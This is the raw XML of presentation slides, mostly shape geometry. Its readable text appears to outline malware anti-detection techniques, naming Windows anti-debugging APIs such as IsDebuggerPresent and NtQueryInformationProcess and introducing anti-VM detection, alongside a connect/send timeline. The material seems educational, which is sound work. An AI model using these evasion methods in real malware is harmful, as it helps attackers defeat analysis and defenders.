                  <a:pt x="170814" y="158772"/>
                  <a:pt x="154997" y="165330"/>
                  <a:pt x="138503" y="165330"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="104166" y="165330"/>
                  <a:pt x="76306" y="137510"/>
                  <a:pt x="76306" y="103132"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="76306" y="102536"/>
                  <a:pt x="76306" y="101940"/>
                  <a:pt x="76346" y="101344"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="76544" y="94309"/>
                  <a:pt x="82387" y="88785"/>
                  <a:pt x="89421" y="88984"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="96456" y="89183"/>
                  <a:pt x="101980" y="95025"/>
                  <a:pt x="101781" y="102059"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="101781" y="102417"/>
                  <a:pt x="101781" y="102775"/>
                  <a:pt x="101781" y="103093"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="101781" y="123401"/>
                  <a:pt x="118235" y="139855"/>
                  <a:pt x="138543" y="139855"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="148280" y="139855"/>
                  <a:pt x="157620" y="136000"/>
                  <a:pt x="164535" y="129084"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="192792" y="100827"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="199667" y="93952"/>
                  <a:pt x="203562" y="84572"/>
                  <a:pt x="203562" y="74836"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="203562" y="54527"/>
                  <a:pt x="187109" y="38074"/>
                  <a:pt x="166800" y="38074"/>
                </a:cubicBezTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="109372" y="68874"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="108617" y="68556"/>
                  <a:pt x="107862" y="68119"/>
                  <a:pt x="107186" y="67642"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="102178" y="65059"/>
                  <a:pt x="96456" y="63588"/>
                  <a:pt x="90454" y="63588"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="80717" y="63588"/>
                  <a:pt x="71378" y="67443"/>
                  <a:pt x="64463" y="74359"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="36206" y="102616"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="29330" y="109491"/>
                  <a:pt x="25435" y="118870"/>
                  <a:pt x="25435" y="128607"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="25435" y="148916"/>
                  <a:pt x="41889" y="165369"/>
                  <a:pt x="62197" y="165369"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="68755" y="165369"/>
                  <a:pt x="75153" y="163621"/>
                  <a:pt x="80757" y="160362"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="87037" y="166721"/>
                  <a:pt x="94349" y="172046"/>
                  <a:pt x="102457" y="176060"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="91249" y="185559"/>
                  <a:pt x="77021" y="190844"/>
                  <a:pt x="62197" y="190844"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="27860" y="190844"/>
                  <a:pt x="0" y="163025"/>
                  <a:pt x="0" y="128647"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="0" y="112154"/>
                  <a:pt x="6558" y="96336"/>
                  <a:pt x="18202" y="84692"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="46459" y="56435"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="58104" y="44790"/>
                  <a:pt x="73921" y="38232"/>
                  <a:pt x="90415" y="38232"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="124832" y="38232"/>
                  <a:pt x="152612" y="66291"/>
                  <a:pt x="152612" y="100589"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="152612" y="101105"/>
                  <a:pt x="152612" y="101622"/>
                  <a:pt x="152612" y="102139"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="152453" y="109173"/>
                  <a:pt x="146611" y="114697"/>
                  <a:pt x="139576" y="114538"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="132542" y="114379"/>
                  <a:pt x="127018" y="108537"/>
                  <a:pt x="127177" y="101503"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="127177" y="101185"/>
                  <a:pt x="127177" y="100907"/>
                  <a:pt x="127177" y="100589"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="127177" y="87195"/>
                  <a:pt x="120023" y="75432"/>
                  <a:pt x="109372" y="68954"/>
                </a:cubicBezTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:solidFill>
            <a:srgbClr val="FF6467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4" name="Text 72"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9406620" y="6196893"/>
            <a:ext cx="729146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8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T+3s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9402380" y="6434289"/>
            <a:ext cx="737624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connect()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10396690" y="5993410"/>
            <a:ext cx="305224" cy="2713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02" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="E0A45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→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10957751" y="5586445"/>
            <a:ext cx="542620" cy="542620"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="542620" h="542620">
                <a:moveTo>
                  <a:pt x="271310" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="271310" y="0"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="421151" y="0"/>
                  <a:pt x="542620" y="121470"/>
                  <a:pt x="542620" y="271310"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="542620" y="271310"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="542620" y="421151"/>
                  <a:pt x="421151" y="542620"/>
                  <a:pt x="271310" y="542620"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="271310" y="542620"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="121470" y="542620"/>
                  <a:pt x="0" y="421151"/>
                  <a:pt x="0" y="271310"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="0" y="271310"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="0" y="121470"/>
                  <a:pt x="121470" y="0"/>
                  <a:pt x="271310" y="0"/>
                </a:cubicBezTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:solidFill>
            <a:srgbClr val="FB2C36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8" name="Shape 76"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="11127320" y="5756014"/>
            <a:ext cx="203483" cy="203483"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="203483" h="203483">
                <a:moveTo>
                  <a:pt x="199747" y="59853"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="161594" y="98005"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="157937" y="101662"/>
                  <a:pt x="152493" y="102735"/>
                  <a:pt x="147724" y="100748"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="142954" y="98761"/>
                  <a:pt x="139894" y="94150"/>
                  <a:pt x="139894" y="89024"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="139894" y="63588"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12718" y="63588"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="5683" y="63588"/>
                  <a:pt x="0" y="57905"/>
                  <a:pt x="0" y="50871"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="0" y="43836"/>
                  <a:pt x="5683" y="38153"/>
                  <a:pt x="12718" y="38153"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="139894" y="38153"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="139894" y="12718"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="139894" y="7591"/>
                  <a:pt x="142994" y="2941"/>
                  <a:pt x="147763" y="954"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="152532" y="-1033"/>
                  <a:pt x="157977" y="79"/>
                  <a:pt x="161634" y="3696"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="199787" y="41849"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="204754" y="46817"/>
                  <a:pt x="204754" y="54885"/>
                  <a:pt x="199787" y="59853"/>
                </a:cubicBezTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="41849" y="199747"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="3696" y="161594"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="-1272" y="156626"/>
                  <a:pt x="-1272" y="148558"/>
                  <a:pt x="3696" y="143590"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="41849" y="105437"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="45505" y="101781"/>
                  <a:pt x="50950" y="100708"/>
                  <a:pt x="55719" y="102695"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="60488" y="104682"/>
                  <a:pt x="63588" y="109332"/>
                  <a:pt x="63588" y="114459"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="63588" y="139894"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="190765" y="139894"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="197799" y="139894"/>
                  <a:pt x="203483" y="145578"/>
                  <a:pt x="203483" y="152612"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="203483" y="159646"/>
                  <a:pt x="197799" y="165330"/>
                  <a:pt x="190765" y="165330"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="63588" y="165330"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="63588" y="190765"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="63588" y="195892"/>
                  <a:pt x="60488" y="200542"/>
                  <a:pt x="55719" y="202529"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="50950" y="204516"/>
                  <a:pt x="45505" y="203403"/>
                  <a:pt x="41849" y="199787"/>
                </a:cubicBezTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:solidFill>
            <a:srgbClr val="FFA2A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9" name="Text 77"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10857917" y="6196893"/>
            <a:ext cx="746103" cy="2034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68" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="E1E3E6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T+5s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10853678" y="6434289"/>
            <a:ext cx="754581" cy="2373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send/recv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17500" y="349250"/>
            <a:ext cx="63500" cy="508000"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="63500" h="508000">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="63500" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="63500" y="508000"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="508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Text 1"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="508000" y="317500"/>
            <a:ext cx="34528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kern="0" spc="100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Category 04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08000" y="571500"/>
            <a:ext cx="3532188" cy="317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25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Anti-Detection Techniques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016000"/>
            <a:ext cx="11437938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Evasion methods used by advanced malware to avoid debugging, VM detection, and sandbox analysis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33375" y="1365250"/>
            <a:ext cx="7286625" cy="1555750"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="7286625" h="1555750">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="7286625" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7286625" y="1555750"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="155575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333375" y="1365250"/>
            <a:ext cx="31750" cy="1555750"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="31750" h="1555750">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="31750" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="31750" y="1555750"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="155575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6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="508000" y="1524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1749" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="349251" y="0"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="366786" y="0"/>
                  <a:pt x="381000" y="14214"/>
                  <a:pt x="381000" y="31749"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="381000" y="349251"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="381000" y="366786"/>
                  <a:pt x="366786" y="381000"/>
                  <a:pt x="349251" y="381000"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="31749" y="381000"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="14214" y="381000"/>
                  <a:pt x="0" y="366786"/>
                  <a:pt x="0" y="349251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Shape 7"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="591344" y="1619250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71438" y="35719"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="71438" y="15999"/>
                  <a:pt x="87437" y="0"/>
                  <a:pt x="107156" y="0"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="126876" y="0"/>
                  <a:pt x="142875" y="15999"/>
                  <a:pt x="142875" y="35719"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="142875" y="37058"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="142875" y="42900"/>
                  <a:pt x="138150" y="47625"/>
                  <a:pt x="132308" y="47625"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="82042" y="47625"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="76200" y="47625"/>
                  <a:pt x="71475" y="42900"/>
                  <a:pt x="71475" y="37058"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="71475" y="35719"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="200025" y="40481"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="203969" y="45727"/>
                  <a:pt x="202890" y="53206"/>
                  <a:pt x="197644" y="57150"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="161255" y="84423"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="163227" y="87734"/>
                  <a:pt x="164716" y="91380"/>
                  <a:pt x="165646" y="95250"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="202406" y="95250"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="208992" y="95250"/>
                  <a:pt x="214313" y="100571"/>
                  <a:pt x="214313" y="107156"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="214313" y="113742"/>
                  <a:pt x="208992" y="119063"/>
                  <a:pt x="202406" y="119063"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="166688" y="119063"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="166688" y="130969"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="166688" y="131936"/>
                  <a:pt x="166650" y="132941"/>
                  <a:pt x="166613" y="133908"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="197644" y="157163"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="202890" y="161106"/>
                  <a:pt x="203969" y="168585"/>
                  <a:pt x="200025" y="173831"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="196081" y="179077"/>
                  <a:pt x="188602" y="180156"/>
                  <a:pt x="183356" y="176212"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="159879" y="158614"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="151247" y="175059"/>
                  <a:pt x="135136" y="186965"/>
                  <a:pt x="116086" y="189830"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="116086" y="104180"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="116086" y="99231"/>
                  <a:pt x="112105" y="95250"/>
                  <a:pt x="107156" y="95250"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="102208" y="95250"/>
                  <a:pt x="98227" y="99231"/>
                  <a:pt x="98227" y="104180"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="98227" y="189830"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="79177" y="186965"/>
                  <a:pt x="63066" y="175059"/>
                  <a:pt x="54434" y="158614"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="30956" y="176213"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="25710" y="180156"/>
                  <a:pt x="18231" y="179077"/>
                  <a:pt x="14288" y="173831"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="10344" y="168585"/>
                  <a:pt x="11423" y="161106"/>
                  <a:pt x="16669" y="157163"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="47699" y="133908"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="47662" y="132941"/>
                  <a:pt x="47625" y="131973"/>
                  <a:pt x="47625" y="130969"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="47625" y="119063"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11906" y="119063"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="5321" y="119063"/>
                  <a:pt x="0" y="113742"/>
                  <a:pt x="0" y="107156"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="0" y="100571"/>
                  <a:pt x="5321" y="95250"/>
                  <a:pt x="11906" y="95250"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="48667" y="95250"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="49597" y="91380"/>
                  <a:pt x="51085" y="87734"/>
                  <a:pt x="53057" y="84423"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="16669" y="57150"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="11423" y="53206"/>
                  <a:pt x="10344" y="45727"/>
                  <a:pt x="14288" y="40481"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="18231" y="35235"/>
                  <a:pt x="25710" y="34156"/>
                  <a:pt x="30956" y="38100"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="71438" y="68461"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="76014" y="66563"/>
                  <a:pt x="81037" y="65484"/>
                  <a:pt x="86320" y="65484"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="127992" y="65484"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="133276" y="65484"/>
                  <a:pt x="138299" y="66526"/>
                  <a:pt x="142875" y="68461"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="183356" y="38100"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="188602" y="34156"/>
                  <a:pt x="196081" y="35235"/>
                  <a:pt x="200025" y="40481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8"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1016000" y="1524000"/>
            <a:ext cx="6524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Anti-Debugging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016000" y="1809750"/>
            <a:ext cx="3190875" cy="476250"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="3190875" h="476250">
                <a:moveTo>
                  <a:pt x="31752" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="3159123" y="0"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="3176659" y="0"/>
                  <a:pt x="3190875" y="14216"/>
                  <a:pt x="3190875" y="31752"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="3190875" y="444498"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="3190875" y="462034"/>
                  <a:pt x="3176659" y="476250"/>
                  <a:pt x="3159123" y="476250"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="31752" y="476250"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="14216" y="476250"/>
                  <a:pt x="0" y="462034"/>
                  <a:pt x="0" y="444498"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="0" y="31752"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="0" y="14216"/>
                  <a:pt x="14216" y="0"/>
                  <a:pt x="31752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10"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1079500" y="1873250"/>
            <a:ext cx="3119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IsDebuggerPresent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79500" y="2063750"/>
            <a:ext cx="3119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Detects debugging environments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270375" y="1809750"/>
            <a:ext cx="3190875" cy="476250"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="3190875" h="476250">
                <a:moveTo>
                  <a:pt x="31752" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="3159123" y="0"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="3176659" y="0"/>
                  <a:pt x="3190875" y="14216"/>
                  <a:pt x="3190875" y="31752"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="3190875" y="444498"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="3190875" y="462034"/>
                  <a:pt x="3176659" y="476250"/>
                  <a:pt x="3159123" y="476250"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="31752" y="476250"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="14216" y="476250"/>
                  <a:pt x="0" y="462034"/>
                  <a:pt x="0" y="444498"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="0" y="31752"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="0" y="14216"/>
                  <a:pt x="14216" y="0"/>
                  <a:pt x="31752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3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4333875" y="1873250"/>
            <a:ext cx="3119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CheckRemoteDebuggerPresent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333875" y="2063750"/>
            <a:ext cx="3119438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External debugging detection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016000" y="2381250"/>
            <a:ext cx="65087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malware uses </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000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NtQueryInformationProcess </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000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 detect debugger presence through process information queries, preventing analysis.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33375" y="3048000"/>
            <a:ext cx="7286625" cy="4532313"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="7286625" h="4532313">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="7286625" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7286625" y="4532313"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="4532313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Shape 17"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="333375" y="3048000"/>
            <a:ext cx="31750" cy="4532313"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="31750" h="4532313">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="31750" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="31750" y="4532313"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="4532313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8"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="508000" y="320675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1749" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="349251" y="0"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="366786" y="0"/>
                  <a:pt x="381000" y="14214"/>
                  <a:pt x="381000" y="31749"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="381000" y="349251"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="381000" y="366786"/>
                  <a:pt x="366786" y="381000"/>
                  <a:pt x="349251" y="381000"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="31749" y="381000"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="14214" y="381000"/>
                  <a:pt x="0" y="366786"/>
                  <a:pt x="0" y="349251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Shape 19"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="603250" y="33020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3455" y="-930"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="90822" y="-5172"/>
                  <a:pt x="99901" y="-5172"/>
                  <a:pt x="107268" y="-930"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="172715" y="36835"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="180082" y="41077"/>
                  <a:pt x="184621" y="48964"/>
                  <a:pt x="184621" y="57448"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="184621" y="132978"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="184621" y="141498"/>
                  <a:pt x="180082" y="149349"/>
                  <a:pt x="172715" y="153591"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="107268" y="191430"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="99901" y="195672"/>
                  <a:pt x="90822" y="195672"/>
                  <a:pt x="83455" y="191430"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="18045" y="153665"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="10678" y="149423"/>
                  <a:pt x="6139" y="141536"/>
                  <a:pt x="6139" y="133052"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="6139" y="57522"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="6139" y="49002"/>
                  <a:pt x="10678" y="41151"/>
                  <a:pt x="18045" y="36909"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="83455" y="-930"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="160772" y="133015"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="160772" y="71214"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="107268" y="102096"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="107268" y="163897"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="160772" y="133015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Text 20"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1016000" y="3206750"/>
            <a:ext cx="6524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Anti-VM Detection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016000" y="3492500"/>
            <a:ext cx="6445250" cy="476250"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="6445250" h="476250">
                <a:moveTo>
                  <a:pt x="31752" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="6413498" y="0"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="6431034" y="0"/>
                  <a:pt x="6445250" y="14216"/>
                  <a:pt x="6445250" y="31752"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="6445250" y="444498"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="6445250" y="462034"/>
                  <a:pt x="6431034" y="476250"/>
